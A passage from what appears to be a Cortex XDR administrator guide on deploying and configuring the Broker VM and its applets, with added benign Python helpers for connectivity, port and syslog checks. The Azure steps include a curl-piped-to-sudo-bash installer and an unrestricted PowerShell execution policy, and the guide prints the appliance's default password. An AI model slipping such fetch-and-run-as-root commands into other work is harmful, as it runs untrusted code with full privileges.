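    domains = parse_edl(SAMPLE_DOMAIN_LIST, "domain")
    return {"ip": ips, "domain": domains,
            "ip_capacity": check_capacity(ips["valid"], DEMO_LIMIT)}


if __name__ == "__main__":
    print(demo())
```

Invalid entries are worth catching before the firewall fetches the list: the hub lets you upload a file of entries in Step 7, and a single malformed line from that file otherwise surfaces only in the firewall's EDL status.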

Broker VM
> Broker VM Overview
> Set up the Broker VM
> Manage Your Broker VMs
> Broker VM Notifications

Broker VM Overview
The Palo Alto Networks Broker is a secured virtual machine (VM), integrated with Cortex XDR, that bridges
your network and Cortex XDR. By setting up the broker, you establish a secure connection in which you can
route your endpoints, and collect and forward logs and files for analysis.
The Broker can be leveraged for running different services separately on the VM using the same Palo Alto
Networks authentication. Once installed, the broker automatically receives updates and enhancements
from Cortex XDR, providing you with new capabilities without having to install a new VM.

Set up Broker VM
The Palo Alto Networks Broker VM is a secured virtual machine (VM), integrated with Cortex XDR, that
bridges your network and the Cortex XDR app. By setting up the broker VM, you establish a secure
connection in which you can route your endpoints, collect logs, and forward logs and files for analysis.
Cortex XDR can leverage the broker VM to run different services separately using the same Palo Alto
Networks authentication. After you complete the initial setup, the broker VM automatically receives
updates and enhancements from Cortex XDR, providing you with new capabilities without having to install
a new VM or manually update the existing VM.
• Configure the Broker VM
• Activate the Agent Proxy
• Activate the Syslog Collector
• Activate the Network Mapper
• Activate Pathfinder
• Activate the Windows Event Collector

Configure the Broker VM


To set up the broker virtual machine (VM), you need to deploy an image created by Palo Alto Networks
on your network or supported cloud infrastructure and activate the available applications. You can set up
several broker VMs for the same tenant to support larger environments. Ensure each environment matches
the necessary requirements.
Before you set up the broker VM, verify you meet the following requirements:
Hardware: For standard installation, use a minimum of a 4-core processor, 8GB RAM, and 512GB disk. If
you only intend to use the broker VM for agent proxy, you can use a 2-core processor.

The broker VM comes with a 512GB disk. Therefore, deploy the broker VM with thin
provisioning, meaning the hard disk can grow up to 512GB but will do so only if needed.
VM compatible with:

Infrastructure | Image Type | Additional Requirements
Amazon Web Services (AWS) | VMDK | Create a Broker VM Amazon Machine Image (AMI)
Google Cloud Platform | VMDK | Set up the Broker VM on Google Cloud Platform (GCP)
Microsoft Azure | VHD (Azure) | Create a Broker VM Azure Image
Microsoft Hyper-V 2012 | VHD | Hyper-V 2012 or later
VMware ESXi | OVA | VMware ESXi 6.0 or later

Enable communication between the Broker Service and other Palo Alto Networks services and apps.

FQDN, Protocol, and Port | Description
(Default) time.google.com and pool.ntp.org, UDP port 123 | NTP server for clock synchronization between the syslog collector and other apps and services. The broker VM provides default servers you can use, or you can define an NTP server of your choice. If you remove the default servers and do not specify a replacement, the broker VM uses the time of the ESX host.
br-<XDR tenant>.xdr.<region>.paloaltonetworks.com, HTTPS over TCP port 443 | Broker Service server, depending on the region of your deployment, either us or eu.
distributions-prod-us.traps.paloaltonetworks.com, HTTPS over TCP port 443 | Information needed to communicate with your Cortex XDR tenant. Used by tenants deployed in all regions.

Enable Access to Cortex XDR from the broker VM to allow communication between agents and the
Cortex XDR app.

You must also add the Broker Service FQDNs to the SSL Decryption Exclusion list on
your Palo Alto Networks firewalls.
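Before deploying, it is worth confirming from the broker VM's subnet that every destination in the table above is reachable. The following Python is an added pre-flight check written for this page, not Palo Alto Networks code. It assumes the two region values the table names (us and eu) and that you run it from a host with the same egress path as the broker VM. The TLS check verifies the server chain against the local CA store, so a verification failure on the Broker Service FQDN is the symptom of SSL decryption in the path, which is why the note above requires a decryption exclusion. The NTP check sends one client-mode request and reads back the server's transmit timestamp.

```python
"""Added example, not from the guide: pre-flight connectivity check for the broker VM's
required destinations (Broker Service and distribution server over TLS/443, NTP over
UDP/123). Region values us/eu are taken from the table above; hostnames are built the
same way the table shows them."""
import socket
import ssl
import struct
import time
from typing import Dict, List, Tuple

NTP_UNIX_EPOCH_OFFSET = 2208988800  # seconds between 1900-01-01 (NTP) and 1970-01-01 (Unix)


def required_endpoints(tenant: str, region: str) -> List[Tuple[str, int, str]]:
    """Build the destination list from the table above for a given tenant and region."""
    if region not in ("us", "eu"):
        raise ValueError("region must be 'us' or 'eu' per the guide")
    return [
        (f"br-{tenant}.xdr.{region}.paloaltonetworks.com", 443, "tls"),
        ("distributions-prod-us.traps.paloaltonetworks.com", 443, "tls"),
        ("time.google.com", 123, "ntp"),
        ("pool.ntp.org", 123, "ntp"),
    ]


def check_tls(host: str, port: int, timeout: float = 5.0) -> Dict[str, object]:
    """TCP connect plus a TLS handshake verified against the system CA store."""
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                issuer = dict(pair[0] for pair in tls.getpeercert()["issuer"])
                return {"host": host, "port": port, "ok": True,
                        "detail": f"TLS ok, issuer={issuer.get('organizationName')}"}
    except ssl.SSLCertVerificationError as exc:
        # An interposed certificate (SSL decryption on a firewall in the path) lands here.
        return {"host": host, "port": port, "ok": False,
                "detail": f"certificate did not verify ({exc.reason}); "
                          "check for SSL decryption on the path"}
    except OSError as exc:  # DNS failure, refused, timeout
        return {"host": host, "port": port, "ok": False, "detail": str(exc)}


def check_ntp(host: str, port: int = 123, timeout: float = 3.0) -> Dict[str, object]:
    """Send one client-mode NTPv3 request (LI=0, VN=3, Mode=3) and parse the reply."""
    request = b"\x1b" + b"\x00" * 47
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(timeout)
            sock.sendto(request, (host, port))
            data, _ = sock.recvfrom(48)
        if len(data) < 48:
            return {"host": host, "port": port, "ok": False, "detail": "short NTP reply"}
        secs = struct.unpack("!I", data[40:44])[0] - NTP_UNIX_EPOCH_OFFSET  # transmit timestamp
        stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(secs))
        return {"host": host, "port": port, "ok": True, "detail": f"server time {stamp}"}
    except OSError as exc:
        return {"host": host, "port": port, "ok": False, "detail": str(exc)}


def preflight(tenant: str, region: str) -> List[Dict[str, object]]:
    return [check_tls(host, port) if kind == "tls" else check_ntp(host, port)
            for host, port, kind in required_endpoints(tenant, region)]


if __name__ == "__main__":
    for result in preflight("example-tenant", "us"):  # placeholder tenant name
        print("OK  " if result["ok"] else "FAIL", result["host"], result["detail"])
```

If the broker VM is configured with an explicit proxy (step 6.2 below), run this check from behind the same proxy, because a direct connection from a jump host proves nothing about the path the broker will actually use.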
Configure your broker VM as follows:

STEP 1 | In Cortex XDR, select Settings > Broker VMs.

STEP 2 | Download and install the broker VM images for your corresponding infrastructure:
• Amazon Web Services (AWS)—Use the VMDK to Create a Broker VM Amazon Machine Image (AMI).
• Google Cloud Platform—Use the VMDK image to Set up the Broker VM on Google Cloud Platform
(GCP).
• Microsoft Hyper-V—Use the VHD image.
• Microsoft Azure—Use the VHD (Azure) image to Create a Broker VM Azure Image.
• VMware ESXi—Use the OVA image.

STEP 3 | Generate Token and copy to your clipboard.

The token is valid only for 24 hours. A new token is generated each time you select
Generate Token.

STEP 4 | Navigate to https://<broker_vm_ip_address>/.

STEP 5 | Log in with the default password !nitialPassw0rd and then define your own unique
password.

The password must contain a minimum of eight characters, contain letters and numbers,
and at least one capital letter and one special character.

STEP 6 | Configure your broker VM settings:

1. In the Network Interface section, review the pre-configured Name, IP address, and MAC Address,
select the Address Allocation: DHCP (default) or Static, and select whether this interface is Disabled
or set as Admin, meaning it serves the broker VM web interface.

• If you choose Static, define the following and Save your configurations:
• Static IP address
• Netmask

• Default Gateway
• DNS Server

2. (Optional) Configure a Proxy Server.


• Select the proxy Type: HTTP, SOCKS4 or SOCKS5
• Enter the proxy Address, Port and an optional User and Password. Select the pencil icon to enter
the password.
• Save your configurations.

3. (Optional) (Requires Broker VM 8.0 and later) Configure your NTP servers.
Enter the required server addresses using the FQDN or IP address of the server.

4. (Requires Broker VM 8.0 and later) (Optional) In the SSH Access section, Enable or Disable SSH
connections to the broker VM. SSH access is authenticated with a public key that you provide; anyone
who holds the matching private key, such as colleagues or Cortex XDR support, can then log in remotely,
so store that private key as carefully as any other administrative credential. You must have App
Administrator role permissions to configure SSH access.
To enable the connection, generate an RSA key pair, enter the public key in the SSH Public Key section,
and Save your configuration.

5. (Requires Broker VM 10.1.9 and later) (Optional) In the SSL Certificates section, upload your signed
server certificate and key to establish a validated secure SSL connection between your endpoints and
the broker VM. Cortex XDR validates that the certificate and key match, but does not validate the
Certificate Authority.

6. (Requires Broker VM 8.0 and later) (Optional) Collect and Download Logs. Your XDR logs will
download automatically after approximately 30 seconds.

STEP 7 | Register and enter your unique Token, created in Cortex XDR console.

Registration of the Broker VM can take up to 30 seconds.

After a successful registration, Cortex XDR displays a notification.

You are directed to Cortex XDR > Settings > Broker VMs. The Broker VMs page displays your
broker VM details and allows you to edit the defined configurations.

Create a Broker VM Amazon Machine Image (AMI)
After you download your Cortex XDR Broker VMDK image, you can convert the image to an Amazon Web
Services (AWS) AMI.
To convert the image:
Set up AWS CLI
(Optional) If you haven’t done so already, set up your AWS CLI as follows:

STEP 1 | Install the AWS CLI bundle by running the following commands on your local machine:

curl "https://s3.amazonaws.com/aws-cli/awscli-bundle.zip" -o "awscli-bundle.zip"
unzip awscli-bundle.zip
sudo /usr/local/bin/python3.7 awscli-bundle/install -i /usr/local/aws -b /usr/local/bin/aws

STEP 2 | Connect to your AWS account by running:

aws configure

Create an AMI Image

STEP 1 | Navigate and log in to your AWS account.

STEP 2 | In the AWS Console, navigate to Services > Storage > S3 > Buckets.

STEP 3 | In the S3 buckets page, + Create bucket to upload your broker image to.

STEP 4 | Upload the Broker VM VMDK you downloaded from Cortex XDR to the AWS S3 bucket.
Run

aws s3 cp ~/<path/to/broker-vm-version.vmdk> s3://<your_bucket>/<broker-vm-version.vmdk>

STEP 5 | Prepare a configuration file on your hard drive.


For example:

[
  {
    "Description": "<Broker VM Version>",
    "Format": "vmdk",
    "UserBucket": {
      "S3Bucket": "<your_bucket>",
      "S3Key": "<broker-vm-version.vmdk>"
    }
  }
]

STEP 6 | Create a AMI image from the VMDK file.


Run

aws ec2 import-image --description="<Broker VM Version>" --disk-containers="file://<path/to/configuration.json>"

Creating an AMI image can take up to 60 minutes to complete.

To track the progress, use the task ID value from the output and run:

aws ec2 describe-import-image-tasks --import-task-ids import-ami-<task-id>
Completed status output example:

{
  "ImportImageTasks": [
    {
      "...",
      "SnapshotDetails": [
        {
          "Description": "Broker VM version",
          "DeviceName": "/dev/<name>",
          "DiskImageSize": 2976817664.0,
          "Format": "VMDK",
          "SnapshotId": "snap-1234567890",
          "Status": "completed",
          "UserBucket": {
            "S3Bucket": "broker-vm",
            "S3Key": "broker-vm-<version>.vmdk"
          }
        }
      ],
      "Status": "completed",
      "..."
    }
  ]
}

STEP 7 | (Optional) After the AMI image has been created, you can define a new name for the image.
Navigate to Services > EC2 > IMAGES > AMIs and locate your AMI image using the task ID. Select the
pencil icon to enter a new name.

Launch an Instance

STEP 1 | Navigate to Services > EC2 > Instances.

STEP 2 | Search for your AMI image and Launch the file.

STEP 3 | In the Launch Instance Wizard define the instance according to your company requirements
and Launch.

STEP 4 | (Optional) In the Instances page, locate your instance and use the pencil icon to rename the
instance Name.

STEP 5 | Define HTTPS and SSH access to your instance.

Right-click your instance and navigate to Networking > Change Security Groups.
In the Change Security Groups pop-up, select HTTPS to be able to access the Broker VM Web UI, and
SSH to allow remote access when troubleshooting. Restrict the source of both rules to your
administrative networks; the broker VM web UI ships with a documented default password, so it must
not be reachable from the Internet.

Assigning security groups can take up to 15 minutes.

STEP 6 | Verify the broker VM has started correctly.


Locate your instance, right-click and navigate to Instance Settings > Get Instance Screenshot.
You are directed to your broker VM console listing your broker details.

Create a Broker VM Azure Image


After you download your Cortex XDR Broker VHD (Azure) image, you need to upload it to Azure as a
storage blob.

To create the image:

STEP 1 | Decompress the downloaded VHD (Azure) image. Make sure you decompress the zipped hard
disk file on a server that has more than 512GB of free space.

Decompression can take up to a few hours.

STEP 2 | Create a new storage blob on your Azure account by uploading the VHD file. You can upload
from either Microsoft Windows or Ubuntu.
Uploading from Microsoft Windows
1. Verify you have:
• Windows PowerShell version 5.1 or later.
• .NET Framework 4.7.2 or later.
2. Open PowerShell and execute Set-ExecutionPolicy unrestricted, then run:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
An unrestricted execution policy is broader than this procedure needs; limiting the change to the
Process scope, or restoring your usual policy after the upload, keeps the machine at its normal setting.
3. Install the Azure cmdlets:
Install-Module -Name Az -AllowClobber
4. Connect to your Azure account:
Connect-AzAccount
5. Start the upload. Note that az is the Azure CLI, which must also be installed on the Windows machine;
the Az PowerShell module does not provide it.
az storage blob upload -f <vhd to upload> -n <vhd name> -c <container name> --account-name <account name>

Upload can take up to a few hours.

Uploading from Ubuntu 18.04

1. Install the Azure CLI. The one-line installer below runs whatever the URL serves as root; if your
policy does not allow that, install the azure-cli package from the Microsoft apt repository instead.
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
2. Connect to Azure:
az login
3. Start the upload:
az storage blob upload -f <vhd to upload> -n <vhd name> -c <container name> --account-name <account name>

STEP 3 | In the Azure home page, navigate to Azure services > Disks and +Add a new disk.

STEP 4 | In the Create a managed disk > Basics page define the following information:
Project details
• Resource group—Select your resource group.
Disk details
• Disk name—Enter a name for the disk object.
• Region—Select your preferred region.

• Source type—Select Storage Blob. Additional fields are displayed; define them as follows:
• Source blob—Select Browse. You are directed to the Storage accounts page. From the navigation
panel, select the storage account and then the container to which you uploaded the Cortex XDR VHD
image. In the Container page, select your VHD image.
• OS type—Select Linux.
• VM generation—Select Gen 1.
Review + create to check your settings.

STEP 5 | Create your broker VM disk.


After deployment is complete Go to resource.

STEP 6 | In your created Disks page, Create VM.

STEP 7 | In the Create a virtual machine page, define the following:


Instance details
• (Optional) Virtual machine name—Enter the same name as the disk name you defined.
• Size—Select the size according to your company guidelines.
Select Next to navigate to the Networking tab.
Network interface
• NIC network security group—Select Advanced.
• Configure network security group—Select HTTPS to be able to access the Broker VM Web UI, and
SSH to allow remote access when troubleshooting. Restrict the source of both rules to your
administrative networks only.
Review + create to check your settings.

STEP 8 | Create your VM.


After deployment is complete Go to resource. You are directed to your VM page.

Creating the VM can take up to 15 minutes. The broker VM Web UI is not accessible
during this time.

Set up the Broker VM on Google Cloud Platform (GCP)


You can deploy the Broker VM on Google Cloud Platform. The Broker VM facilitates communication with
external services through the installation and setup of applets such as the syslog collector.
To set up the Broker VM on the Google Cloud Platform, you install the VMDK image provided in Cortex
XDR. To complete the setup, you must have the Google Cloud SDK (gcloud and gsutil) installed and an
authenticated user account.

STEP 1 | Download the Broker VM VMDK image from Cortex XDR (see Configure the Broker VM).

STEP 2 | In Google Cloud, create a Google Cloud Storage bucket to store the broker VM image.
1. Create a project in GCP and enable Google Cloud Storage, for example: brokers-project. Make sure
you have defined a Default Network.
2. Create a bucket to store the image, for example: broker-vms

STEP 3 | Open a command prompt and run:

gcloud config set project <project-name>

STEP 4 | Upload the VMDK image to the bucket, run:

gsutil cp </path/to/broker.vmdk> gs://<bucket-name>

STEP 5 | Import GCP image.


You can import the GCP image using either the gcloud CLI or the Google Cloud console.

The import tool uses the Cloud Build API, which must be enabled in your project. For
image import to work, the Cloud Build service account must have the compute.admin and
iam.serviceAccountUser roles. When using the Google Cloud console to import the
image, you will be prompted to add these permissions automatically.

• gcloud CLI
The following command uses the minimum required parameters. For more information on
permissions and available parameters, refer to the Google Cloud SDK.
Open a command prompt and run:

gcloud beta compute images import <VMDK image> --os=ubuntu-1804 --source-file="gs://<image path>" --network=<network_name> --subnet=<subnet_name> --zone=<region> --async
• Google Cloud Console
1. Navigate to Compute Engine > Images.
2. Create Image.
3. Complete the following fields:
• Enter a meaningful Name for this image, for example: broker-9-0-32
• Select Virtual disk (VMDK, VHD) as the Source.
• To select the Cloud Storage file, Browse and select the bucket and the VMDK image you
uploaded.
• Select Ubuntu 18.04 Bionic as the Operating system on virtual disk.
• Allow Compute Engine to Install guest packages.
• Create the image.
The image creation process can take up to 20 minutes.

STEP 6 | When Google Compute Engine completes the image creation, create a new instance.
1. From the Google Cloud Platform, select Compute Engine > VM instances.
2. Create instance.
3. In the Boot disk option, choose Custom images and select the image you created.
4. In the Firewall section, Allow HTTPS traffic.
5. Set up the instance according to your needs.
If you are using the broker VM to facilitate only the Agent Proxy, use e2-standard-2. If you are using the
broker VM for multiple applets, use e2-standard-4.

STEP 7 | Continue the steps to Configure the Broker VM.

Activate the Agent Proxy


After you have configured and registered your broker VM, activate your agent proxy collector application.
You must have either Cortex XDR Prevent or Cortex XDR Pro per Endpoint licenses to activate the agent
proxy.
The Agent Proxy is used for routing all the agent traffic via a centralized and controlled access point in your
network. Each proxy on the broker VM can support up to 10,000 agents.

STEP 1 | In Cortex XDR, navigate to Settings > Broker > VMs and locate your broker VM.

STEP 2 | Right-click, select Agent Proxy > Activate.

STEP 3 | From Cortex XDR, Create an Agent Installation Package and download it to the endpoint.

The Broker Service is supported with Traps agent version 5.0.9 and Traps agent version
6.1.2 and later releases.

STEP 4 | Run the installation package on each endpoint according to the endpoint OS. During
installation you must configure the IP address of the broker VM and a port number. You can
use the default 8888 port or set a custom port. See the Cortex XDR Agent Administrator’s
Guide for installation instructions.

You are not permitted to configure port numbers in the ranges 0-1024 and 63000-65000, or
the port numbers 4369, 5671, 5672, 5986, 6379, 8000, 9100, 15672, and 25672. Additionally,
you are not permitted to reuse port numbers you already assigned to the Syslog Collector
applet.

STEP 5 | After a successful activation, the Apps field displays Agent Proxy - Active.

STEP 6 | In the Apps field, select Agent Proxy to view the agent proxy Resources.

STEP 7 | Manage the Agent Proxy.


After the Agent Proxy has been activated, right-click your broker VM and select:
• Agent Proxy > Configure to redefine the port.
• Agent Proxy > Deactivate to disable the agent proxy.

Activate the Syslog Collector


Ingesting Logs and Data from external sources requires a Cortex XDR Pro per TB license.

To receive Syslog data from an external source, you must first set up the Syslog Collector applet on a
Broker VM within your network. The Syslog Collector supports a log ingestion rate of 90,000 logs per
second (lps) with the recommended Broker VM setup. To increase the log ingestion rate, you can add
additional CPUs to the broker VM. The Syslog Collector listens for logs on specific ports and from any or
specific IP addresses.

STEP 1 | If you haven’t already done so, Configure the Broker VM.

STEP 2 | In Cortex XDR, navigate to Settings > Broker > VMs and locate your broker VM.

STEP 3 | Right-click the broker VM and select Syslog Collector > Activate.

STEP 4 | Configure your Syslog Collector:


Cortex XDR supports multiple sources over a single port on a single Syslog Collector. For each source,
define the following settings:

• Listening Port—Choose a port on which the Syslog Collector will listen for logs.

Because some port numbers are reserved by Cortex XDR, you must choose a port
number that is not:
• In the range of 0-1024 (except for 514)
• In the range of 63000-65000
• Values of 4369, 5671, 5672, 5986, 6379, 8000, 8888, 9100, 15672, or 25672
• Protocol—Choose the protocol over which the Syslog will be sent. Use TCP for reliable and secure
transport of logs, or UDP for non-secure transport.
• Source IP—If you leave this blank, Cortex XDR will allow receipt of logs from any source IP address
that transmits over the specified protocol and port. Otherwise enter a public IP address to restrict
receipt from a specific source. Avoid using private IP addresses as these will fail Cortex XDR
validation tests.
• Syslog Format—Select the Syslog format you want to send to the listening port on the Syslog
Collector: CEF, LEEF, CISCO, or CORELIGHT.

After each configuration, save the changes and then Update to update the Syslog Collector
with your settings.
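The port rules stated for the Agent Proxy (STEP 4 of Activate the Agent Proxy) and for the Syslog Collector above, together with the source IP and format rules, encoded as an added Python example that is not part of this guide or of Cortex XDR. It checks a planned source configuration before you enter it in the console; function names and the sample values are this example's own.

```python
"""Port and source validation for Broker VM applets.

Added example, not part of the Cortex XDR guide or product: it encodes the port
restrictions the guide states for the Agent Proxy and Syslog Collector applets,
plus the source-IP and format rules, so a planned configuration can be checked
before it is entered in the console. Function names are this example's own.
"""
import ipaddress
from typing import Iterable, List, Optional

# Individual ports the guide lists as reserved by Cortex XDR for both applets.
RESERVED_PORTS = {4369, 5671, 5672, 5986, 6379, 8000, 9100, 15672, 25672}
AGENT_PROXY_DEFAULT_PORT = 8888   # reserved for syslog sources, usable by the Agent Proxy
SYSLOG_PROTOCOLS = {"TCP", "UDP"}
SYSLOG_FORMATS = {"CEF", "LEEF", "CISCO", "CORELIGHT"}


def _reserved_range_error(port: int) -> Optional[str]:
    """Return why `port` falls in a reserved range, or None if it does not."""
    if not 0 <= port <= 65535:
        return f"port {port} is not a valid TCP/UDP port"
    if port <= 1024:
        return f"port {port} is in the reserved range 0-1024"
    if 63000 <= port <= 65000:
        return f"port {port} is in the reserved range 63000-65000"
    return None


def syslog_port_error(port: int) -> Optional[str]:
    """Syslog Collector rule: 514 is allowed; the other low/high ranges and the
    reserved list (including the Agent Proxy default 8888) are not."""
    if port == 514:
        return None
    err = _reserved_range_error(port)
    if err:
        return err
    if port in RESERVED_PORTS or port == AGENT_PROXY_DEFAULT_PORT:
        return f"port {port} is reserved by Cortex XDR"
    return None


def agent_proxy_port_error(port: int, syslog_ports: Iterable[int] = ()) -> Optional[str]:
    """Agent Proxy rule: no 514 exception, the reserved list applies, and ports
    already assigned to Syslog Collector sources may not be reused."""
    err = _reserved_range_error(port)
    if err:
        return err
    if port in RESERVED_PORTS:
        return f"port {port} is reserved by Cortex XDR"
    if port in set(syslog_ports):
        return f"port {port} is already assigned to the Syslog Collector applet"
    return None


def syslog_source_errors(port: int, protocol: str, syslog_format: str,
                         source_ip: str = "") -> List[str]:
    """Validate one Syslog Collector source row; an empty list means it passes."""
    errors = []
    err = syslog_port_error(port)
    if err:
        errors.append(err)
    if protocol.upper() not in SYSLOG_PROTOCOLS:
        errors.append(f"protocol must be TCP or UDP, not {protocol!r}")
    if syslog_format.upper() not in SYSLOG_FORMATS:
        errors.append(f"unsupported syslog format {syslog_format!r}")
    if source_ip:  # blank means "accept logs from any source IP"
        try:
            addr = ipaddress.ip_address(source_ip)
        except ValueError:
            errors.append(f"source IP {source_ip!r} is not a valid IP address")
        else:
            if addr.is_private:
                errors.append(f"source IP {source_ip} is private and fails Cortex XDR validation")
    return errors


if __name__ == "__main__":
    # Constructed sample plan: three syslog sources and one agent proxy port.
    plan = [(1514, "TCP", "CEF", "8.8.8.8"), (8888, "UDP", "LEEF", ""),
            (514, "udp", "cisco", "10.0.0.5")]
    for row in plan:
        print(row, syslog_source_errors(*row) or "ok")
    print("agent proxy 1514:", agent_proxy_port_error(1514, syslog_ports=[1514]) or "ok")
```

The private-address check uses the standard library's `is_private`, which also flags the documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so use a genuinely public source address when you test it.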

STEP 5 | Right-click the Broker VM on which you configured the Syslog Collector and select Syslog
Collector > Activate.
After a successful activation, the Apps field displays the Syslog Collector - Active.

STEP 6 | (Optional) To view metrics about the Syslog Collector, hover over the Syslog Collector link in
the Apps field:
Cortex XDR displays the following information:
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Logs Received and Logs Sent—Number of logs received and sent by the applet per second over the
last 24 hours. If the number of incoming logs received is larger than the number of logs sent, it could
indicate a connectivity issue.
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

STEP 7 | Manage the Syslog Collector.


After the Syslog Collector has been activated, you can make additional changes to your configuration if
needed. To modify a configuration, right-click your broker VM and select:
• Syslog Collector > Configure to redefine the Syslog configurations.
• Syslog Collector > Deactivate to disable the Syslog Collector.
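To confirm that a source can reach a Syslog Collector listening port, the following added Python example (not code from this guide or from Cortex XDR) builds a CEF-formatted event with the escaping the CEF format requires, wraps it in a syslog frame, and delivers it over TCP, the protocol recommended above for reliable transport. A loopback listener stands in for the Broker VM so it runs offline; the host name, application name and event fields are constructed.

```python
"""Send a constructed CEF event to a Syslog Collector listener over TCP.

Added example, not code from the Cortex XDR guide or product. It builds a
CEF:0 message with the escaping the CEF format requires, wraps it in a BSD
syslog frame, and delivers newline-terminated frames over TCP. A loopback
listener stands in for the Broker VM so the round trip can be exercised
offline; host names and field values are constructed.
"""
import socket
import threading
from datetime import datetime, timezone
from typing import Dict, List, Optional


def cef_escape_header(value) -> str:
    """Header fields escape the backslash and the pipe delimiter."""
    return str(value).replace("\\", "\\\\").replace("|", "\\|")


def cef_escape_extension(value) -> str:
    """Extension values escape the backslash and '='; line breaks become \\r and \\n."""
    return (str(value).replace("\\", "\\\\").replace("=", "\\=")
            .replace("\r", "\\r").replace("\n", "\\n"))


def build_cef(vendor: str, product: str, version: str, signature_id: str,
              name: str, severity: int, extensions: Dict[str, str]) -> str:
    """CEF:0|Vendor|Product|Version|SignatureID|Name|Severity|key=value ..."""
    header = "|".join(cef_escape_header(v) for v in
                      (vendor, product, version, signature_id, name, severity))
    ext = " ".join(f"{k}={cef_escape_extension(v)}" for k, v in extensions.items())
    return f"CEF:0|{header}|{ext}"


def syslog_frame(message: str, hostname: str = "sensor01", app: str = "acme-ids",
                 facility: int = 1, severity: int = 6,
                 timestamp: Optional[str] = None) -> bytes:
    """RFC 3164-style frame: <PRI>TIMESTAMP HOST TAG: MSG, newline-terminated for TCP."""
    pri = facility * 8 + severity
    ts = timestamp or datetime.now(timezone.utc).strftime("%b %d %H:%M:%S")
    return f"<{pri}>{ts} {hostname} {app}: {message}\n".encode("utf-8")


def send_syslog_tcp(host: str, port: int, frames: List[bytes], timeout: float = 5.0) -> int:
    """Deliver frames over one TCP connection; returns the number of frames sent."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for frame in frames:
            sock.sendall(frame)
    return len(frames)


def loopback_roundtrip(frames: List[bytes]) -> List[str]:
    """Stand-in for the Broker VM listener: accept one connection on an ephemeral
    loopback port and return the newline-delimited messages it received."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)
    port = server.getsockname()[1]
    received = bytearray()

    def serve() -> None:
        conn, _ = server.accept()
        with conn:
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                received.extend(chunk)

    worker = threading.Thread(target=serve, daemon=True)
    worker.start()
    try:
        send_syslog_tcp("127.0.0.1", port, frames)
        worker.join(timeout=5.0)
    finally:
        server.close()
    return received.decode("utf-8").splitlines()


if __name__ == "__main__":
    event = build_cef("Acme", "Sensor", "1.0", "100", "Login|failed", 7,
                      {"src": "198.51.100.7", "suser": "jdoe", "msg": "bad password=3x"})
    for line in loopback_roundtrip([syslog_frame(event)]):
        print(line)
```

To send a real test event, call send_syslog_tcp with the broker VM address and the Listening Port you configured for a CEF source over TCP; the Logs Received counter in the applet metrics should then increment.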

Activate the Network Mapper


After you have configured and registered your broker VM, you can choose to activate the Network Mapper
application.
The Network Mapper allows you to scan your network to detect and identify unmanaged hosts in your
environment according to defined IP address ranges. The Network Mapper configurations are used to
deploy the Pathfinder Data Collector on unmanaged endpoints and to track and locate unmanaged assets that
appear in the Assets table.
Activating the Network Mapper requires a Cortex XDR Pro per Endpoint or Cortex XDR Pro per TB license.

STEP 1 | In Cortex XDR, navigate to Settings > Broker > VMs and locate your broker VM.

STEP 2 | Right-click and select Network Mapper > Activate.

STEP 3 | In the Activate Network Mapper window, define the following parameters:

• Scan Method—Select either the ICMP echo or the TCP SYN scan method to identify your network hosts.
When selecting TCP SYN you can enter single ports and ranges together, for example 80-83, 443.
• Scan Requests per Second—Define the maximum number of scan requests you want to send on your
network per second. By default, the number of scan requests is 1000.

Each IP address range can receive multiple scan requests based on its availability.

• Scanning Scheduler—Define when you want to run the network mapper scan. You can select either
daily, weekly, or monthly at a specific time.
• Scanned Ranges—Select from the list of existing IP address ranges to scan. Make sure to save after
each selection.

IP address ranges are displayed according to what you defined as your Network
Parameters.

STEP 4 | Activate the applet.


After a successful activation, the Apps field displays Network Mapper - Active, Connected.

STEP 5 | In the Apps field, select Network Mapper to view the following scan and applet metrics:
• Scan Details
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Scan Status—State of the scan.
• Scan Start Time—Timestamp of when the scan started.
• Scan Duration—Period of time in minutes and seconds the scan is running.
• Scan Progress—How much of the scan has been completed in percentage and IP address ratio.
• Detected Hosts—Number of hosts identified from within the IP address ranges.
• Scan Rate—Number of IP addresses scanned per second.
• Applet Metrics
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

STEP 6 | Manage the Network Mapper.
After the network mapper has been activated, right-click your broker VM and select:
• Network Mapper > Configure to redefine the network mapper configurations.
• Network Mapper > Scan Now to initiate a scan.
• Network Mapper > Deactivate to disable the network mapper.

Activate Pathfinder
After you have configured and registered your broker VM, activate the Pathfinder application. To activate
Pathfinder, you must have a Cortex XDR Pro per Endpoint or Cortex XDR Pro per TB license.
Pathfinder™ is a highly recommended, but optional, component integrated with the Broker VM that deploys
a non-persistent data collector on network hosts, servers, and workstations that are not managed by a
Cortex XDR agent. The collector is automatically triggered by Analytics type alerts with a severity of High
and Medium as described in the Cortex XDR Analytics Alert Reference, providing insights into assets that
you would previously be unable to scan.
When an alert is triggered, the data collector is able to run for up to 2 weeks gathering EDR data from
unmanaged hosts. You can track and manage the collector directly from the Cortex XDR console, and
investigate the EDR data by running a query from the Query Center.
Cortex XDR supports activating Pathfinder on Windows operating systems with PowerShell version 3 and
above, excluding Vanilla Windows 7.
Activate the Pathfinder app to deploy and query the data collector.

STEP 1 | In Cortex XDR, navigate to Settings > Broker > VMs and locate your broker VM.

STEP 2 | Right-click and select Pathfinder > Activate.

STEP 3 | In the Pathfinder Activation wizard, complete the following steps:


1. Define the Pathfinder Credentials used by the applet to access and deploy the data collector. The
Data Collector is deployed only within your defined IP address ranges. You can either define the
domain access credentials or, as of broker VM version 9.0 and later, define Pathfinder to access
target hosts using credentials stored in your CyberArk vault.

The Broker VM requires an SA account that has administrator privileges on all
Windows workstations and servers in your environment. Due to this, Cortex XDR
